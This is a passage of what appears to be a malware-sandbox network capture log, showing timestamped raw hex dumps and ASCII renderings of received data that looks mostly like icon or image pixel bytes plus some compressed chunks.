ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d5 9b 47 ff d5 9b 47 ff d6 9b 47 ff d4 9a 47 fe d6 9b 47 fa d4 9a 47 e1 d4 99 46 ad d2 94 44 73
                                                                                              Data Ascii: GF3DsGFGGGGGGGGGGGGGGGGGGGGGGGGGFDs
                                                                                              2021-12-07 12:39:07 UTC930INData Raw: 99 47 66 d8 9d 47 ee d5 9b 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d6 9b 47 ff d5 9b 47 af d4 9a 46 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 8e 31 10 d0 93 3b b6 d6 9b 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d6 9c 47 ff d6 9b 47 d6
                                                                                              Data Ascii: GfGGGGGGGGGGF1;GGGGGGGGG
                                                                                              2021-12-07 12:39:07 UTC937INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 9a 46 a4
                                                                                              Data Ascii: F
                                                                                              2021-12-07 12:39:07 UTC945INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 8d 3f 5d c8 84 1f fe c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f fd ce 91 39 b6 d3 99 47 97 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 97 ce 91 39 b4 c9 85 1e ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c6 83 1e ff ce 90 36 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff
                                                                                              Data Ascii: ?]9GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG96GGGGGGGGGG
                                                                                              2021-12-07 12:39:07 UTC953INData Raw: 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d8 9d 48 ff d2 9b 49 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 9a 47 1b d6 9b 47 f3 d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d5 9b 47 ff d3 9c 45 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d1 91 3a 57 c7 84 1f fe c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f fb d0 94 3e a9 d3 99 47 97 d3 99 47 98 d3 99 47 98 d3 99 47 98
                                                                                              Data Ascii: GGGGHIjGGGGGGGEe:W>GGGG
                                                                                              2021-12-07 12:39:07 UTC961INData Raw: 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 97 ce 91 39 b4 c9 85 1e ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c6 83 1e ff d2 92 37 ff d4 9a 49 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: GGGGGGGGGGGG97Ij
                                                                                              2021-12-07 12:39:07 UTC969INData Raw: 9a 47 ff d5 9a 47 ff d5 9a 47 c5 d4 9b 47 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 90 40 2f ca 86 22 f1 c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c8 85 21 f8 d0 95 3d ab d3 99 47 97 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98
                                                                                              Data Ascii: GGGG@/"!=GGGGGGGGGGGGGGGGGGGGGGG
                                                                                              2021-12-07 12:39:07 UTC977INData Raw: 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 97 d3 99 47 97 d2 97 43 9d cd 8f 36 be c9 88 26 e7 c8 84 1f fc c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c7 84 1f ff c8 85 21 fc cc 8d 2f 9a ca 8d 32 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: GGGGGGGGGGGGGGGGGGGC6&!/2
                                                                                              2021-12-07 12:39:07 UTC984INData Raw: ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 e0 00 00 00 00 00 00 00 00 00 07 ff ff ff f8 07 f0 00 00 00 00 00 00 00 00 00 07 ff ff ff f0 0f f0 00 00 00 00 00 00 00 00 00 07 ff ff ff f0 0f f0 00 00 00 00 00 00 00 00 00 07 ff ff ff f0 0f f0 00 00 00 00 00 00 00 00 00 07 ff ff ff f0 0f f0 00 00 00 00 00 00 00 00 00 07 ff ff ff e0 0f f8 00 00 00 00 00 00 00 00 00 07 ff ff ff e0 1f f8 00 00 00 00 00 00 00 00 00 07 ff ff ff e0 1f f8 00 00 00 00 00 00 00 00 00 07 ff ff ff e0 1f f8 00 00 00 00 00 00 00 00 00 07 ff ff ff c0 1f fc 00 00 00 00 00 00 00 00 00 07 ff
                                                                                              Data Ascii:
                                                                                              2021-12-07 12:39:07 UTC992INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 9a 47 78 d6 9b 47 f5 d4 9a 46 fe d4 9a 47 ff d4 9a 47 ff d3 99 46 fe d6 9b 47 f5 d2 98 48 51 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: GxGFGGFGHQ
                                                                                              2021-12-07 12:39:07 UTC1000INData Raw: 83 1e fe c6 83 1e fe c7 84 1f fe cc 8e 34 c4 d2 99 47 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d2 98 46 97 d3 98 47 97 cf 93 3d ac c8 84 1e fe c6 83 1e fe c6 83 1e fe c6 83 1e fe c6 83 1e fe c6 83 1e fe ce 8f 35 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d3 99 46 fe d5 9b 47 fa d3 98 45 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 9e 48 bb d6 9c 48 fe d3 9b 48 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: 4GFFFFFFFFFFFFFFFFFFFFFG=5FFFFFFFFGE>HHHO
                                                                                              2021-12-07 12:39:07 UTC1008INData Raw: 00 00 00 d4 99 46 19 d6 9b 47 f6 d3 99 46 fe d3 99 46 fe d4 9a 46 fe d5 9b 46 dd d4 9b 46 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 89 27 01 ca 8a 29 a7 c7 84 1f fe c7 84 1f ff c7 84 1f ff c7 84 1e fe cd 8f 34 c1 d3 99 47 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 97 cf 93 3d ac c8 84 1e fe ca 88 25 e9 d3 98 46 98 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d3 99 47 96 d1 94 40 a7 c8 85 20 f9 c6 83 1e fe c7 84 1f ff c7 84 1f ff c6 83 1e fe c7 84 1f ff
                                                                                              Data Ascii: FGFFFFF')4GGFGFGGFGGFGGFGGFGGFGG=%FGGGGGGGGGG@
                                                                                              2021-12-07 12:39:07 UTC1016INData Raw: 98 46 97 d2 99 47 97 d3 98 45 9a cc 8c 2e d1 c7 84 1f fb c6 83 1e fe c6 83 1e fe c6 83 1e fe c6 83 1e fe c7 84 1e fe cb 89 29 c3 cf 91 38 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 89 2a 12 cc 8b 2b ae c7 84 1f ff c7 84 1f ff c6 83 1e fe c7 84 1f ff c7 84 1f ff c7 84 1e fe c9 88 26 e9 d0 94 3d ae d2 99 47 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97
                                                                                              Data Ascii: FGE.)8*+&=GGGFGGGFGGF
                                                                                              2021-12-07 12:39:07 UTC1023INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 99 46 07 d5 9a 47 37 d5 9b 47 83 d4 9a 46 c8 d4 9a 47 ef d5 9a 47 fd d4 9a 47 fe d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 fd d4 9a 47 f0 d4 99 46 c8 d4 9a 46 83 d3 99 46 37 d3 9a 45 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: FG7GFGGGGGGGGGGGGGGGGFFF7E
                                                                                              2021-12-07 12:39:07 UTC1031INData Raw: 84 1f ff c6 83 1e fe c8 85 21 f5 d2 97 44 9d d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 98 d2 98 46 97 d3 99 47 97 ce 8f 35 c1 c7 84 1e ff c7 84 1f ff c6 83 1e fe c7 84 1f ff c6 83 1e fe c7 84 1f ff cd 8f 34 fe d3 9a 46 ff d3 99 46 fe d4 9a 47 ff d4 9a 47 ff d5 9a 46 e0 d4 99 45 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 9b 47 19 d8 9d 48 f3 d5 9c 49 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d2 9a 45 0b d4 9b 46 e7
                                                                                              Data Ascii: !DGGFGFGFGFGGFGFGFG54FFGGFEGHI{EF
                                                                                              2021-12-07 12:39:07 UTC1039INData Raw: 99 46 ff d4 9a 47 fe d4 9a 47 97 d4 9a 47 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 89 28 09 ca 89 27 b1 c7 84 1f fe c7 84 1f ff c7 84 1f ff c7 84 1f fe cc 8c 2e d2 d2 98 45 9b d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98
                                                                                              Data Ascii: FGGG('.EGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
                                                                                              2021-12-07 12:39:07 UTC1047INData Raw: 8f 7f b2 ae 83 1e 00 86 dd 43 fe 97 df 5e 7e 6a bb b5 5f 6d 8b f4 4c 58 8b bd cb d7 a4 a0 3b a1 c7 40 3a 9b 33 e6 85 49 4d 99 e5 c6 70 08 65 72 d9 7b 23 93 aa 37 20 6a ad 04 db ba e2 e3 76 96 a3 63 2d 51 cb ee 5e 8c 7d ba 2a c0 06 cd 1e ad 69 c9 98 8b 1e f9 e4 9c ff a9 e7 98 1b cd b0 7a d0 4f bd 61 d9 5f 15 2b f1 8f 3a 62 1c 5e 0d f6 f5 c3 72 43 25 c3 b4 79 42 3e f3 c4 98 bc f7 27 55 35 6e d6 1f 1d 10 41 89 c8 b6 15 e3 43 b7 16 2b 27 57 44 a7 f4 6f 49 b0 db 08 34 7b b8 f8 d1 4f 9f fc bb ba 0e b8 81 0c 9b 07 fe d4 1b 1e ff ab 62 05 75 11 3f 41 e3 9c 47 af 4c 2e 64 fe 98 0b bc 36 05 b1 9b f5 47 17 44 ac 04 95 52 18 8f 79 bd 2b 3c b9 14 cb b4 ea 92 a0 1f 71 01 f6 d0 e4 61 4d 53 e0 7f e8 b1 4f 9d f0 70 fd 46 db 38 86 c5 43 7f da 0d 8f ff 55 fb 2e f1 f7 b5 b0
                                                                                              Data Ascii: C^~j_mLX;@:3IMper{#7 jvc-Q^}*izOa_+:b^rC%yB>'U5nAC+'WDoI4{Obu?AGL.d6GDRy+<qaMSOpF8CU.
                                                                                              2021-12-07 12:39:07 UTC1055INData Raw: 36 eb bf 9a f8 4c d1 30 85 88 d5 8a 72 c6 e7 a6 31 ad 13 31 36 c3 4e fc 7d c0 04 39 48 a5 d4 cc 92 a6 1b c6 f0 86 62 ba 98 8d 69 16 db eb 51 fe 5d a8 52 29 b6 72 d7 c2 8f a7 73 ff 81 3e 18 80 05 0b 16 e8 9b bf fe 8e e7 0a 7e f0 e2 ce 48 4f 4a fc 64 93 e1 b2 95 c9 5d 51 34 b6 90 f1 77 8c 64 1f 40 55 73 86 74 47 de e7 05 99 b8 2b 14 15 d8 a4 bb 39 8e 5d 48 54 01 a0 1b da 2b b4 69 b0 c7 32 10 bc eb 96 55 07 47 d0 bf 24 cf f7 25 51 f0 af 9a fd 07 d2 27 83 b8 f8 6a 5f ee 99 da 00 00 c0 81 d3 5a 2b eb 37 94 7f a1 61 74 02 28 e1 6e 80 2a 44 a4 d0 11 da e9 85 8c ff c7 ee 93 8b 23 d1 0f c8 88 ea 4e 52 fb cb a5 57 9d f8 e0 60 0f c6 31 7c 88 48 e7 a9 62 4a 92 d2 5f 40 d5 fd 57 1b 0b 1b fa af ae ed c5 62 5f ee d9 27 d7 ea e7 17 ce 8c 88 71 47 96 a8 23 71 a1 02 28 94
                                                                                              Data Ascii: 6L0r116N}9HbiQ]R)rs>~HOJd]Q4wd@UstG+9]HT+i2UG$%Q'j_Z+7at(n*D#NRW`1|HbJ_@Wb_'qG#q(
                                                                                              2021-12-07 12:39:07 UTC1062INData Raw: 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 fe d4 9a 46 d3 d4 9a 47 66 d3 9a 47 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 9a 46 04 d4 9a 46 63 d4 9a 47 e2 d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d5 9a 47 fd d5 9b 47 e4 d5 9b 46 aa d5 9b 46 7a d3 99 46 54 d3 99 46 37 d4 99 46 26 d3 99 46 1c d3 99 46 1c d4 99 46 26 d3 99 46 36
                                                                                              Data Ascii: GGGGGGGGFGfGFFcGGGGGGGGFFzFTF7F&FFF&F6
                                                                                              2021-12-07 12:39:07 UTC1070INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d1 99 44 30 d5 9a 47 fe d4 9a 47 ff d4 9a 47 fc d4 9a 46 0d 00 00 00 00 00 00 00 00 c9 89 2b 02 c9 86 24 ea c7 84 1f ff c7 84 1f ff ce 91 38 bb d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d1 95 40 a5 c9 85 1e ff d0 93 3d ad d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 98 d3 99 47 97 ca 88 28 e4 c7 84 1f ff c7 84 1f ff c7 84 1f ff c6 83 1e ff cd 8f 34 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d4 9a 47 ff d6 9b 47 ff d3 9b 48 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: D0GGGF+$8GGGGGGGGGGGGGGG@=GGGGGGG(4GGGGGH5
                                                                                              2021-12-07 12:39:07 UTC1078INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 99 45 03 d3 9a 45 22 d4 9a 46 4d d3 9a 46 6f d4 9a 47 85 d4 9a 46 8c d4 9a 47 8c d4 9a 47 85 d3 9a 46 6f d4 9a 45 4e d3 99 46 23 d3 99 45 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d3 9a 46 06 d3 99 46 4c d5 9b 47 9f d4 9a 46 e2 d4 9a 47 fb d4 9a 47 fe d4 9a 47 ff d3 99 46 fe d3 99 46 fe d4 9a 47 ff
                                                                                              Data Ascii: EE"FMFoGFGGFoENF#EFFLGFGGGFFG
                                                                                              2021-12-07 12:39:07 UTC1086INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 8a 2a 19 c9 87 26 a3 c7 84 1f fb c6 83 1e fe c7 84 1f ff c7 84 1f fb ca 89 29 e2 ce 90 35 c1 d0 95 40 a8 d2 98 45 9a d3 99 47 97 d3 98 47 97 d2 99 47 97 d3 99 47 97 d3 98 47 97 d3 99 47 97 d2 98 45 9a d0 95 40 a7 ce 90 36 c1 ca 89 29 e1 c7 84 1f fb c7 84 1f ff c6 83 1e fe c7 84 1f fb c9 87 26 a4 c9 89 29 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: *&)5@EGGGGGGE@6)&)
                                                                                              2021-12-07 12:39:07 UTC1094INData Raw: ff e3 00 81 ff f1 00 80 ff f1 00 80 00 f9 00 00 06 f8 00 00 06 f8 00 00 00 fc 00 00 00 fc 00 00 00 f8 00 00 00 f8 00 80 00 f9 00 80 00 71 00 80 00 31 00 c0 00 03 00 e0 00 07 00 e0 00 07 00 f8 00 1f 00 fc 00 3f 00 ff 81 ff 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 70 32 1b c7 91 42 5e d4 9a 46 7f d4 9a 46 7f c9 92 42 5e 9d 72 34 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 7d 39 1b d4 9a 46 a7 d4 9a 46 c0 d4 9a 46 73 bd 89 3f 4c ba 87 3e 4c d4 9a 46 73 d4 9a 47 bf d4 9a 47 a8 b3 82 3b 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 85 33 36
                                                                                              Data Ascii: q1?( @p2B^FFB^r4}9FFFs?L>LFsGG;36
                                                                                              2021-12-07 12:39:07 UTC1102INData Raw: 99 2e 79 21 02 06 1a 0b f9 a6 c6 01 6c 09 57 3a 28 f1 8d 22 0c 5d db 10 d2 73 10 84 74 dd b2 7d 17 1b a7 25 64 81 08 90 2f 1d e2 e8 70 e8 61 a6 9d 5e b1 d8 20 71 53 8e 3c 94 14 a1 fd 2f bc e1 e6 eb 6e b8 6d 3f 62 4e 04 18 07 50 75 61 23 27 75 42 1a 19 a6 e1 94 89 89 45 88 2b 06 59 85 b2 4f 5b 7a e5 c1 6c ca 4b 07 f8 0b 8c f7 d0 89 a3 48 c3 90 12 79 09 a0 3d 0d 2c 21 22 66 e2 e7 0c c0 3b ca 6d 1c 42 55 02 d2 60 2f e8 47 42 3d 02 4d a5 bc 07 1e 96 35 b8 1e e9 0c ca 1a c0 3d d3 ec 0a 4a 45 46 0f 56 94 fe 7e 99 71 77 38 ed 28 cd 55 5a 59 a2 cb 9c c1 4e 19 a4 a8 50 ee a0 61 1a 3b 1e 71 51 10 30 dd cf 0a 1d 17 5a 34 38 c8 2a ef 42 80 05 d3 d4 8b 12 40 4a d2 8b 9d 48 80 e3 2f aa d4 0c 9c 41 54 7a a5 23 c7 4e 20 4d d3 42 4e 71 ac 85 28 37 34 cd 81 14 2b 2a b8 3a
                                                                                              Data Ascii: .y!lW:("]st}%d/pa^ qS</nm?bNPua#'uBE+YO[zlKHy=,!"f;mBU`/GB=M5=JEFV~qw8(UZYNPa;qQ0Z48*B@JH/ATz#N MBNq(74+*:
